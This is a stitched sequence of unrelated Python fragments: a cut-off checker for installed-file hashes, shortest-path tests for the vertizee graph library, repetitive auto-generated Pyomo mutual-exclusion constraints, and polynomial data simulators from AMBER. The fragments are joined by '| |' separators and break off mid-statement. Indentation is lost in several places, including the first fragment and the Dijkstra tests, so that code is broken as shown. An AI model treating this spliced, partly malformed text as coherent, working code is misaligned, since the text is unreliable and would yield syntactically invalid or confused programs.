# add the RECORD file itself
if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
return record_path
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = self.get_distinfo_file('RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', | |
# Source: vertizee/algorithms/paths/tests/test_single_source_shortest_paths.py
# (repo: cpeisert/vertizee)
# Copyright 2020 The Vertizee Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for algorithms that solve the single-source-shortest-paths problem."""
# pylint: disable=no-self-use
# pylint: disable=missing-function-docstring
import timeit
from typing import cast, Optional
import pytest
from vertizee import NegativeWeightCycle
from vertizee.algorithms.algo_utils.path_utils import reconstruct_path, ShortestPath
from vertizee.algorithms.paths.single_source import (
bellman_ford,
dijkstra,
dijkstra_fibonacci,
shortest_paths,
breadth_first_search_shortest_paths,
)
from vertizee.classes.data_structures.vertex_dict import VertexDict
from vertizee.classes.edge import Attributes, MultiEdgeBase
from vertizee.classes.graph import DiGraph, MultiDiGraph, MultiGraph
from vertizee.classes.vertex import DiVertex, MultiDiVertex, MultiVertex, V
class TestBellmanFord:
    """Tests for Bellman-Ford algorithm.

    The digraph with negative edge weights (but no negative cycle) was
    previously duplicated verbatim in three tests; it is now built once by
    :meth:`_negative_weight_digraph`.
    """
    @staticmethod
    def _negative_weight_digraph() -> DiGraph:
        """Return the shared digraph with negative edge weights and no
        negative-weight cycle."""
        return DiGraph(
            [
                ("s", "t", 10),
                ("s", "y", 5),
                ("t", "y", -6),
                ("t", "x", 1),
                ("x", "z", 4),
                ("y", "t", 8),
                ("y", "x", 4),
                ("y", "z", -3),
                ("z", "s", 7),
                ("z", "x", 6),
            ]
        )
    def test_bellman_ford_default_edge_weight(self) -> None:
        """Shortest-path lengths on a digraph with non-negative weights."""
        g = DiGraph(
            [
                ("s", "t", 10),
                ("s", "y", 5),
                ("t", "y", 2),
                ("t", "x", 1),
                ("x", "z", 4),
                ("y", "t", 3),
                ("y", "x", 9),
                ("y", "z", 2),
                ("z", "s", 7),
                ("z", "x", 6),
            ]
        )
        path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s")
        assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
        assert path_dict["s"].length == 0, "Length of s path should be 0."
        assert path_dict["t"].length == 8, "Length of path s ~> t should be 8."
        assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
        assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
        assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
    def test_bellman_ford_negative_edge_weights(self) -> None:
        """Correct lengths in the presence of negative edge weights."""
        g = self._negative_weight_digraph()
        path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s")
        assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
        assert path_dict["s"].length == 0, "Length of s path should be 0."
        assert path_dict["t"].length == 10, "Length of path s ~> t should be 10."
        assert path_dict["x"].length == 7, "Length of path s ~> x should be 7."
        assert path_dict["y"].length == 4, "Length of path s ~> y should be 4."
        assert path_dict["z"].length == 1, "Length of path s ~> z should be 1."
    def test_bellman_ford_path_reconstruction(self) -> None:
        """Saved paths agree with reconstruct_path()."""
        g = self._negative_weight_digraph()
        path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s", save_paths=True)
        assert path_dict["t"].path() == ["s", "t"], "Path s ~> t should be [s, t]."
        assert path_dict["x"].path() == [
            "s",
            "t",
            "y",
            "z",
            "x",
        ], "Path s ~> x should be [s, t, y, z, x]."
        assert path_dict["z"].path() == ["s", "t", "y", "z"], "Path s ~> z should be [s, t, y, z]."
        path_s_t = reconstruct_path("s", "t", path_dict)
        assert path_s_t == path_dict["t"].path(), "Algorithm path should match reconstructed path."
        path_s_x = reconstruct_path("s", "x", path_dict)
        assert path_s_x == path_dict["x"].path(), "Algorithm path should match reconstructed path."
        path_s_z = reconstruct_path("s", "z", path_dict)
        assert path_s_z == path_dict["z"].path(), "Algorithm path should match reconstructed path."
    def test_bellman_ford_reverse_graph(self) -> None:
        """With reverse_graph=True, lengths follow the transposed edges."""
        g = self._negative_weight_digraph()
        path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s", reverse_graph=True)
        assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
        assert path_dict["s"].length == 0, "Length of s path should be 0."
        assert path_dict["t"].length == -2, "Length of path s ~> t should be -2."
        assert path_dict["x"].length == 11, "Length of path s ~> x should be 11."
        assert path_dict["y"].length == 4, "Length of path s ~> y should be 4."
        assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
    def test_bellman_ford_negative_weight_cycle(self) -> None:
        """A negative-weight cycle reachable from the source raises."""
        g = DiGraph(
            [
                ("s", "t", 10),
                ("s", "y", 5),
                ("t", "y", -6),
                ("t", "x", 1),
                ("x", "z", 4),
                ("y", "t", 8),
                ("y", "x", 4),
                ("y", "z", -3),
                ("z", "s", -2),
                ("z", "x", 6),
            ]
        )
        with pytest.raises(NegativeWeightCycle):
            bellman_ford(g, "s")
    def test_bellman_ford_undirected_negative_weight_cycle(self) -> None:
        """In an undirected graph, any negative edge implies a negative
        cycle (traverse it back and forth)."""
        g = MultiGraph(
            [
                ("s", "t", 10),
                ("s", "y", 5),
                ("t", "y", -6),
                ("t", "x", 1),
                ("x", "z", 4),
                ("y", "t", 8),
                ("y", "x", 4),
                ("y", "z", -3),
                ("z", "s", 7),
                ("z", "x", 6),
            ]
        )
        with pytest.raises(NegativeWeightCycle):
            bellman_ford(g, "s")
    def test_bellman_ford_undirected(self) -> None:
        """Shortest paths in an undirected multigraph with positive weights."""
        g = MultiGraph(
            [
                ("s", "t", 10),
                ("s", "y", 5),
                ("t", "y", 6),
                ("t", "x", 1),
                ("x", "z", 4),
                ("y", "t", 8),
                ("y", "x", 4),
                ("y", "z", 3),
                ("z", "s", 7),
                ("z", "x", 6),
            ]
        )
        path_dict: VertexDict[ShortestPath[MultiVertex]] = bellman_ford(g, "s")
        assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
        assert path_dict["s"].length == 0, "Length of s path should be 0."
        assert path_dict["t"].length == 10, "Length of path s ~> t should be 10."
        assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
        assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
        assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
class TestBreadthFirstSearchShortestPaths:
    """Tests for shortest-paths unweighted using breadth-first search."""
    def test_breadth_first_search_shortest_paths(self) -> None:
        """BFS distances on an unweighted digraph (each edge = one hop)."""
        edge_list = [
            ("s", "t"),
            ("s", "y"),
            ("t", "y"),
            ("t", "x"),
            ("x", "z"),
            ("y", "t"),
            ("y", "x"),
            ("y", "z"),
            ("z", "s"),
            ("z", "x"),
        ]
        graph = DiGraph(edge_list)
        path_dict: VertexDict[ShortestPath[DiVertex]] = breadth_first_search_shortest_paths(
            graph, "s"
        )
        assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
        assert path_dict["s"].length == 0, "Length of s path should be 0."
        assert path_dict["t"].length == 1, "Length of path s ~> t should be 1."
        assert path_dict["x"].length == 2, "Length of path s ~> x should be 2."
        assert path_dict["y"].length == 1, "Length of path s ~> y should be 1."
        assert path_dict["z"].length == 2, "Length of path s ~> z should be 2."
class TestDijkstra:
"""Tests for Dijkstra's algorithm."""
def test_dijkstra_default_edge_weight(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 2),
("t", "x", 1),
("x", "z", 4),
("y", "t", 3),
("y", "x", 9),
("y", "z", 2),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = dijkstra(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 8, "Length of path s ~> t should be 8."
assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
def test_dijkstra_path_reconstruction(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 2),
("t", "x", 1),
("x", "z", 4),
("y", "t", 3),
("y", "x", 9),
("y", "z", 2),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = dijkstra(g, "s", save_paths=True)
assert path_dict["t"].path() == ["s", "y", "t"], "Path s ~> t should be [s, y, t]."
assert path_dict["x"].path() == ["s", "y", "t", "x"], "Path s ~> x should be [s, y, t, x]."
assert path_dict["z"].path() == ["s", "y", "z"], "Path s ~> z should be [s, y, z]."
path_s_t = reconstruct_path("s", "t", path_dict)
assert path_s_t == path_dict["t"].path(), "Algorithm path should match reconstructed path."
path_s_x = reconstruct_path("s", "x", path_dict)
assert path_s_x == path_dict["x"].path(), "Algorithm path should match reconstructed path."
path_s_z = reconstruct_path("s", "z", path_dict)
assert path_s_z == path_dict["z"].path(), "Algorithm path should match reconstructed path."
def test_dijkstra_edge_attr_weights(self) -> None:
WEIGHT = "weight_key"
g = DiGraph(
[
("s", "t"),
("s", "y"),
("t", "y"),
("t", "x"),
("x", "z"),
("y", "t"),
("y", "x"),
("y", "z"),
("z", "s"),
("z", "x"),
]
)
g.get_edge("s", "t")[WEIGHT] = 10
g.get_edge("s", "y")[WEIGHT] = 5
g.get_edge("t", "y")[WEIGHT] | |
= Constraint(expr= m.b618 + m.b621 <= 1)
# Auto-generated pairwise mutual-exclusion constraints: within each group of
# four binary variables, every pair may have at most one variable active.
# NOTE(review): the generator emits several pairs more than once (e.g. c1546
# and c1549 both enforce b622 + b623 <= 1); the duplicates are redundant but
# do not change the feasible region.
m.c1544 = Constraint(expr= m.b619 + m.b621 <= 1)
m.c1545 = Constraint(expr= m.b620 + m.b621 <= 1)
# group b622..b625
m.c1546 = Constraint(expr= m.b622 + m.b623 <= 1)
m.c1547 = Constraint(expr= m.b622 + m.b624 <= 1)
m.c1548 = Constraint(expr= m.b622 + m.b625 <= 1)
m.c1549 = Constraint(expr= m.b622 + m.b623 <= 1)
m.c1550 = Constraint(expr= m.b623 + m.b624 <= 1)
m.c1551 = Constraint(expr= m.b623 + m.b625 <= 1)
m.c1552 = Constraint(expr= m.b622 + m.b624 <= 1)
m.c1553 = Constraint(expr= m.b623 + m.b624 <= 1)
m.c1554 = Constraint(expr= m.b624 + m.b625 <= 1)
m.c1555 = Constraint(expr= m.b622 + m.b625 <= 1)
m.c1556 = Constraint(expr= m.b623 + m.b625 <= 1)
m.c1557 = Constraint(expr= m.b624 + m.b625 <= 1)
# group b626..b629
m.c1558 = Constraint(expr= m.b626 + m.b627 <= 1)
m.c1559 = Constraint(expr= m.b626 + m.b628 <= 1)
m.c1560 = Constraint(expr= m.b626 + m.b629 <= 1)
m.c1561 = Constraint(expr= m.b626 + m.b627 <= 1)
m.c1562 = Constraint(expr= m.b627 + m.b628 <= 1)
m.c1563 = Constraint(expr= m.b627 + m.b629 <= 1)
m.c1564 = Constraint(expr= m.b626 + m.b628 <= 1)
m.c1565 = Constraint(expr= m.b627 + m.b628 <= 1)
m.c1566 = Constraint(expr= m.b628 + m.b629 <= 1)
m.c1567 = Constraint(expr= m.b626 + m.b629 <= 1)
m.c1568 = Constraint(expr= m.b627 + m.b629 <= 1)
m.c1569 = Constraint(expr= m.b628 + m.b629 <= 1)
# group b630..b633
m.c1570 = Constraint(expr= m.b630 + m.b631 <= 1)
m.c1571 = Constraint(expr= m.b630 + m.b632 <= 1)
m.c1572 = Constraint(expr= m.b630 + m.b633 <= 1)
m.c1573 = Constraint(expr= m.b630 + m.b631 <= 1)
m.c1574 = Constraint(expr= m.b631 + m.b632 <= 1)
m.c1575 = Constraint(expr= m.b631 + m.b633 <= 1)
m.c1576 = Constraint(expr= m.b630 + m.b632 <= 1)
m.c1577 = Constraint(expr= m.b631 + m.b632 <= 1)
m.c1578 = Constraint(expr= m.b632 + m.b633 <= 1)
m.c1579 = Constraint(expr= m.b630 + m.b633 <= 1)
m.c1580 = Constraint(expr= m.b631 + m.b633 <= 1)
m.c1581 = Constraint(expr= m.b632 + m.b633 <= 1)
# group b634..b637
m.c1582 = Constraint(expr= m.b634 + m.b635 <= 1)
m.c1583 = Constraint(expr= m.b634 + m.b636 <= 1)
m.c1584 = Constraint(expr= m.b634 + m.b637 <= 1)
m.c1585 = Constraint(expr= m.b634 + m.b635 <= 1)
m.c1586 = Constraint(expr= m.b635 + m.b636 <= 1)
m.c1587 = Constraint(expr= m.b635 + m.b637 <= 1)
m.c1588 = Constraint(expr= m.b634 + m.b636 <= 1)
m.c1589 = Constraint(expr= m.b635 + m.b636 <= 1)
m.c1590 = Constraint(expr= m.b636 + m.b637 <= 1)
m.c1591 = Constraint(expr= m.b634 + m.b637 <= 1)
m.c1592 = Constraint(expr= m.b635 + m.b637 <= 1)
m.c1593 = Constraint(expr= m.b636 + m.b637 <= 1)
# group b638..b641
m.c1594 = Constraint(expr= m.b638 + m.b639 <= 1)
m.c1595 = Constraint(expr= m.b638 + m.b640 <= 1)
m.c1596 = Constraint(expr= m.b638 + m.b641 <= 1)
m.c1597 = Constraint(expr= m.b638 + m.b639 <= 1)
m.c1598 = Constraint(expr= m.b639 + m.b640 <= 1)
m.c1599 = Constraint(expr= m.b639 + m.b641 <= 1)
m.c1600 = Constraint(expr= m.b638 + m.b640 <= 1)
m.c1601 = Constraint(expr= m.b639 + m.b640 <= 1)
m.c1602 = Constraint(expr= m.b640 + m.b641 <= 1)
m.c1603 = Constraint(expr= m.b638 + m.b641 <= 1)
m.c1604 = Constraint(expr= m.b639 + m.b641 <= 1)
m.c1605 = Constraint(expr= m.b640 + m.b641 <= 1)
# group b642..b645
m.c1606 = Constraint(expr= m.b642 + m.b643 <= 1)
m.c1607 = Constraint(expr= m.b642 + m.b644 <= 1)
m.c1608 = Constraint(expr= m.b642 + m.b645 <= 1)
m.c1609 = Constraint(expr= m.b642 + m.b643 <= 1)
m.c1610 = Constraint(expr= m.b643 + m.b644 <= 1)
m.c1611 = Constraint(expr= m.b643 + m.b645 <= 1)
m.c1612 = Constraint(expr= m.b642 + m.b644 <= 1)
m.c1613 = Constraint(expr= m.b643 + m.b644 <= 1)
m.c1614 = Constraint(expr= m.b644 + m.b645 <= 1)
m.c1615 = Constraint(expr= m.b642 + m.b645 <= 1)
m.c1616 = Constraint(expr= m.b643 + m.b645 <= 1)
m.c1617 = Constraint(expr= m.b644 + m.b645 <= 1)
# group b646..b649
m.c1618 = Constraint(expr= m.b646 + m.b647 <= 1)
m.c1619 = Constraint(expr= m.b646 + m.b648 <= 1)
m.c1620 = Constraint(expr= m.b646 + m.b649 <= 1)
m.c1621 = Constraint(expr= m.b646 + m.b647 <= 1)
m.c1622 = Constraint(expr= m.b647 + m.b648 <= 1)
m.c1623 = Constraint(expr= m.b647 + m.b649 <= 1)
m.c1624 = Constraint(expr= m.b646 + m.b648 <= 1)
m.c1625 = Constraint(expr= m.b647 + m.b648 <= 1)
m.c1626 = Constraint(expr= m.b648 + m.b649 <= 1)
m.c1627 = Constraint(expr= m.b646 + m.b649 <= 1)
m.c1628 = Constraint(expr= m.b647 + m.b649 <= 1)
m.c1629 = Constraint(expr= m.b648 + m.b649 <= 1)
# group b650..b653
m.c1630 = Constraint(expr= m.b650 + m.b651 <= 1)
m.c1631 = Constraint(expr= m.b650 + m.b652 <= 1)
m.c1632 = Constraint(expr= m.b650 + m.b653 <= 1)
m.c1633 = Constraint(expr= m.b650 + m.b651 <= 1)
m.c1634 = Constraint(expr= m.b651 + m.b652 <= 1)
m.c1635 = Constraint(expr= m.b651 + m.b653 <= 1)
m.c1636 = Constraint(expr= m.b650 + m.b652 <= 1)
m.c1637 = Constraint(expr= m.b651 + m.b652 <= 1)
m.c1638 = Constraint(expr= m.b652 + m.b653 <= 1)
m.c1639 = Constraint(expr= m.b650 + m.b653 <= 1)
m.c1640 = Constraint(expr= m.b651 + m.b653 <= 1)
m.c1641 = Constraint(expr= m.b652 + m.b653 <= 1)
# group b654..b657
m.c1642 = Constraint(expr= m.b654 + m.b655 <= 1)
m.c1643 = Constraint(expr= m.b654 + m.b656 <= 1)
m.c1644 = Constraint(expr= m.b654 + m.b657 <= 1)
m.c1645 = Constraint(expr= m.b654 + m.b655 <= 1)
m.c1646 = Constraint(expr= m.b655 + m.b656 <= 1)
m.c1647 = Constraint(expr= m.b655 + m.b657 <= 1)
m.c1648 = Constraint(expr= m.b654 + m.b656 <= 1)
m.c1649 = Constraint(expr= m.b655 + m.b656 <= 1)
m.c1650 = Constraint(expr= m.b656 + m.b657 <= 1)
m.c1651 = Constraint(expr= m.b654 + m.b657 <= 1)
m.c1652 = Constraint(expr= m.b655 + m.b657 <= 1)
m.c1653 = Constraint(expr= m.b656 + m.b657 <= 1)
# group b658..b661
m.c1654 = Constraint(expr= m.b658 + m.b659 <= 1)
m.c1655 = Constraint(expr= m.b658 + m.b660 <= 1)
m.c1656 = Constraint(expr= m.b658 + m.b661 <= 1)
m.c1657 = Constraint(expr= m.b658 + m.b659 <= 1)
m.c1658 = Constraint(expr= m.b659 + m.b660 <= 1)
m.c1659 = Constraint(expr= m.b659 + m.b661 <= 1)
m.c1660 = Constraint(expr= m.b658 + m.b660 <= 1)
m.c1661 = Constraint(expr= m.b659 + m.b660 <= 1)
m.c1662 = Constraint(expr= m.b660 + m.b661 <= 1)
m.c1663 = Constraint(expr= m.b658 + m.b661 <= 1)
m.c1664 = Constraint(expr= m.b659 + m.b661 <= 1)
m.c1665 = Constraint(expr= m.b660 + m.b661 <= 1)
# group b662..b665
m.c1666 = Constraint(expr= m.b662 + m.b663 <= 1)
m.c1667 = Constraint(expr= m.b662 + m.b664 <= 1)
m.c1668 = Constraint(expr= m.b662 + m.b665 <= 1)
m.c1669 = Constraint(expr= m.b662 + m.b663 <= 1)
m.c1670 = Constraint(expr= m.b663 + m.b664 <= 1)
m.c1671 = Constraint(expr= m.b663 + m.b665 <= 1)
m.c1672 = Constraint(expr= m.b662 + m.b664 <= 1)
m.c1673 = Constraint(expr= m.b663 + m.b664 <= 1)
m.c1674 = Constraint(expr= m.b664 + m.b665 <= 1)
m.c1675 = Constraint(expr= m.b662 + m.b665 <= 1)
m.c1676 = Constraint(expr= m.b663 + m.b665 <= 1)
m.c1677 = Constraint(expr= m.b664 + m.b665 <= 1)
# group b666..b669
m.c1678 = Constraint(expr= m.b666 + m.b667 <= 1)
m.c1679 = Constraint(expr= m.b666 + m.b668 <= 1)
m.c1680 = Constraint(expr= m.b666 + m.b669 <= 1)
m.c1681 = Constraint(expr= m.b666 + m.b667 <= 1)
m.c1682 = Constraint(expr= m.b667 + m.b668 <= 1)
m.c1683 = Constraint(expr= m.b667 + m.b669 <= 1)
m.c1684 = Constraint(expr= m.b666 + m.b668 <= 1)
m.c1685 = Constraint(expr= m.b667 + m.b668 <= 1)
m.c1686 = Constraint(expr= m.b668 + m.b669 <= 1)
m.c1687 = Constraint(expr= m.b666 + m.b669 <= 1)
m.c1688 = Constraint(expr= m.b667 + m.b669 <= 1)
m.c1689 = Constraint(expr= m.b668 + m.b669 <= 1)
# group b670..b673
m.c1690 = Constraint(expr= m.b670 + m.b671 <= 1)
m.c1691 = Constraint(expr= m.b670 + m.b672 <= 1)
m.c1692 = Constraint(expr= m.b670 + m.b673 <= 1)
m.c1693 = Constraint(expr= m.b670 + m.b671 <= 1)
m.c1694 = Constraint(expr= m.b671 + m.b672 <= 1)
m.c1695 = Constraint(expr= m.b671 + m.b673 <= 1)
m.c1696 = Constraint(expr= m.b670 + m.b672 <= 1)
m.c1697 = Constraint(expr= m.b671 + m.b672 <= 1)
m.c1698 = Constraint(expr= m.b672 + m.b673 <= 1)
m.c1699 = Constraint(expr= m.b670 + m.b673 <= 1)
m.c1700 = Constraint(expr= m.b671 + m.b673 <= 1)
m.c1701 = Constraint(expr= m.b672 + m.b673 <= 1)
# group b674..b677
m.c1702 = Constraint(expr= m.b674 + m.b675 <= 1)
m.c1703 = Constraint(expr= m.b674 + m.b676 <= 1)
m.c1704 = Constraint(expr= m.b674 + m.b677 <= 1)
m.c1705 = Constraint(expr= m.b674 + m.b675 <= 1)
m.c1706 = Constraint(expr= m.b675 + m.b676 <= 1)
m.c1707 = Constraint(expr= m.b675 + m.b677 <= 1)
m.c1708 = Constraint(expr= m.b674 + m.b676 <= 1)
m.c1709 = Constraint(expr= m.b675 + m.b676 <= 1)
m.c1710 = Constraint(expr= m.b676 + m.b677 <= 1)
m.c1711 = Constraint(expr= m.b674 + m.b677 <= 1)
m.c1712 = Constraint(expr= m.b675 + m.b677 <= 1)
m.c1713 = Constraint(expr= m.b676 + m.b677 <= 1)
# group b678..b681
m.c1714 = Constraint(expr= m.b678 + m.b679 <= 1)
m.c1715 = Constraint(expr= m.b678 + m.b680 <= 1)
m.c1716 = Constraint(expr= m.b678 + m.b681 <= 1)
m.c1717 = Constraint(expr= m.b678 + m.b679 <= 1)
m.c1718 = Constraint(expr= m.b679 + m.b680 <= 1)
m.c1719 = Constraint(expr= m.b679 + m.b681 <= 1)
m.c1720 = Constraint(expr= m.b678 + m.b680 <= 1)
m.c1721 = Constraint(expr= m.b679 + m.b680 <= 1)
m.c1722 = Constraint(expr= m.b680 + m.b681 <= 1)
m.c1723 = Constraint(expr= m.b678 + m.b681 <= 1)
m.c1724 = Constraint(expr= m.b679 + m.b681 <= 1)
m.c1725 = Constraint(expr= m.b680 + m.b681 <= | |
# Source: AMBER/amber/utils/simulator.py
from __future__ import print_function
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
from sklearn.preprocessing import PolynomialFeatures
class BaseSimulator:
    """Minimal interface shared by the data simulators below.

    Subclasses override :meth:`sample_effect`, :meth:`sample_data` and
    :meth:`get_ground_truth`; the base versions are intentional no-ops.
    """
    def __init__(self, n, p, *args, **kwargs):
        """
        Args:
            n: number of samples to simulate.
            p: number of input features.
            *args: ignored; accepted for subclass signature compatibility.
            **kwargs: ignored; accepted for subclass signature compatibility.
        """
        self.n = n
        self.p = p
    def sample_effect(self):
        """Hook: draw random effect sizes. No-op in the base class."""
    def sample_data(self):
        """Hook: draw a simulated dataset. No-op in the base class."""
    def get_ground_truth(self, X):
        """Hook: noiseless response for ``X``. No-op in the base class."""
class Simulator(BaseSimulator):
    """Simulates a degree-2 polynomial response:
    y = X_s @ [beta_a, beta_i] + Gaussian noise, where X_s is the
    PolynomialFeatures(2) expansion of X (additive terms first, then the
    squared/pairwise interaction terms).
    """
    def __init__(self, n, p, beta_a, beta_i, noise_var=1.,
                 discretized=False, *args, **kwargs):
        """
        Args:
            n: number of samples drawn per call to :meth:`sample_data`.
            p: number of additive input features.
            beta_a: effect sizes of the p additive terms.
            beta_i: effect sizes of the degree-2 interaction terms, in the
                order produced by ``PolynomialFeatures(2)``.
            noise_var: variance of the additive Gaussian noise on y.
            discretized: if True, X is drawn from the integers {0, 1, 2};
                otherwise X is drawn uniformly from [0, 3).
            *args: ignored; accepted for signature compatibility.
            **kwargs: ignored; accepted for signature compatibility.
        """
        self.n = n
        self.p = p
        self.beta_a = np.array(beta_a).astype('float32')
        self.beta_i = np.array(beta_i).astype('float32')
        self.noise_var = noise_var
        self.discretized = discretized
    def sample_effect(self, drop_a, drop_i):
        """Randomly re-draw effect sizes in place, zeroing each coefficient
        with the given masking probability.

        Bug fix: the previous implementation assigned the *function object*
        ``np.random.normal`` to ``beta_a``/``beta_i`` instead of sampling
        from it, which broke every subsequent use of the betas as arrays.

        :param drop_a: probability of masking (zeroing) each additive effect
        :param drop_i: probability of masking each interaction effect
        """
        keep_a = np.random.binomial(1, 1. - drop_a, size=self.beta_a.shape)
        self.beta_a = (np.random.normal(size=self.beta_a.shape) *
                       keep_a).astype('float32')
        keep_i = np.random.binomial(1, 1. - drop_i, size=self.beta_i.shape)
        self.beta_i = (np.random.normal(size=self.beta_i.shape) *
                       keep_i).astype('float32')
    def sample_data(self):
        """Draw a dataset from the simulated model.

        :rtype (X,y): a tuple of X and y
        """
        if self.discretized:
            X = np.array(np.random.randint(low=0, high=3, size=self.n * self.p)).reshape(self.n, self.p).astype(
                'float32')
        else:
            X = np.array(np.random.uniform(low=0, high=3, size=self.n * self.p)).reshape(self.n, self.p).astype(
                'float32')
        # Expand to additive + degree-2 interaction columns, matching the
        # layout of [beta_a, beta_i].
        X_s = PolynomialFeatures(2, interaction_only=False, include_bias=False).fit_transform(X)
        beta = np.concatenate([self.beta_a, self.beta_i])
        y = X_s.dot(beta) + np.random.normal(loc=0, scale=np.sqrt(self.noise_var), size=self.n)
        return X, y
    def get_ground_truth(self, X):
        """Return the noiseless response X_s @ [beta_a, beta_i] for ``X``."""
        X_s = PolynomialFeatures(2, interaction_only=False, include_bias=False).fit_transform(X)
        beta = np.concatenate([self.beta_a, self.beta_i])
        return X_s.dot(beta)
class HigherOrderSimulator(BaseSimulator):
    """Simulates a sparse polynomial response of arbitrary degree, for
    benchmarking interaction-effect detection."""
    def __init__(self,
                 n,
                 p,
                 noise_var=0.1,
                 x_var=1.,
                 degree=3,
                 with_input_blocks=False,
                 drop_a=0.2,
                 drop_i=0.8,
                 discretize_beta=False,
                 discretize_x=False,
                 *args, **kwargs):
        """
        A vanilla simulator that simulates an arbitrary high-order Polynomial,
        for benchmarking interaction effects
        Args:
            n: default number of samples drawn by `sample_data`.
            p: number of input features.
            noise_var: variance of the additive Gaussian noise on y.
            x_var: variance of continuous X, or the Poisson rate when
                `discretize_x` is True.
            degree: maximum polynomial degree of the response.
            with_input_blocks: if True, `sample_data` returns X as a list of
                (N, 1) per-feature columns instead of a single (N, p) matrix.
            drop_a: fraction of additive coefficients left at zero.
            drop_i: fraction of interaction coefficients left at zero.
            discretize_beta: if True, coefficients are drawn from {-1, 0, 1}.
            discretize_x: if True, X is drawn from a Poisson distribution.
        """
        self.n = n
        self.p = p
        self.with_input_blocks = with_input_blocks
        self.noise_var = noise_var
        self.x_var = x_var
        self.degree = degree
        self.polynomial_fitter = PolynomialFeatures(degree=degree, interaction_only=False, include_bias=False)
        # Fit on zeros purely to initialize the expansion metadata
        # (n_output_features_ and powers_); the fitted values are unused.
        self.polynomial_fitter.fit(np.zeros((self.n, self.p)))
        # The first p expanded columns are the additive (degree-1) terms;
        # every later column is a higher-order term.
        self.beta_a = np.zeros(p)
        self.beta_i = np.zeros(self.polynomial_fitter.n_output_features_ - p)
        self.powers_i_ = self.polynomial_fitter.powers_[p:]
        self.drop_a = drop_a
        self.drop_i = drop_i
        if discretize_beta:
            self.beta_rng = lambda p: np.random.choice(range(-1, 2), p)
        else:
            self.beta_rng = lambda p: np.random.uniform(-1, 1, p)
        if discretize_x:
            self.x_rng = lambda n: np.random.poisson(x_var, n)
        else:
            self.x_rng = lambda n: np.random.normal(0, np.sqrt(x_var), n)
        # Effects are drawn lazily on the first call to sample_data().
        self.is_beta_built = False
    def sample_effect(self):
        """Draw sparse effect sizes in place: a (1 - drop) fraction of each
        coefficient vector is sampled, the rest stays zero."""
        # additive
        a_idx = np.random.choice(self.p, int(np.ceil(self.p * (1 - self.drop_a))), replace=False)
        self.beta_a[a_idx] = self.beta_rng(len(a_idx))
        # interaction
        i_idx = np.random.choice(len(self.beta_i), int(np.ceil(len(self.beta_i) * (1 - self.drop_i))), replace=False)
        self.beta_i[i_idx] = self.beta_rng(len(i_idx))
        self.is_beta_built = True
    def set_effect(self, beta_a, beta_i):
        """Install externally supplied effect sizes instead of sampling."""
        self.beta_a = beta_a
        self.beta_i = beta_i
        self.is_beta_built = True
    def sample_data(self, N=None, *args, **kwargs):
        """Draw (X, y); N defaults to self.n. Effects are sampled on first
        use so repeated calls share the same betas."""
        N = self.n if N is None else N
        X = self.x_rng(N * self.p).reshape(N, self.p)
        X_s = self.polynomial_fitter.transform(X)
        if not self.is_beta_built:
            self.sample_effect()
        beta = np.concatenate([self.beta_a, self.beta_i])
        y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
        if self.with_input_blocks:
            # NOTE(review): X is 2-D here, so the `len(X.shape) > 2` branch
            # never fires; each feature becomes an (N, 1) column block.
            X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
        return X, y
    def get_ground_truth(self, X):
        """Return the noiseless response for X (block list or matrix form)."""
        if self.with_input_blocks:
            X_ = np.concatenate(X, axis=1)
        else:
            X_ = X
        X_s = self.polynomial_fitter.transform(X_)
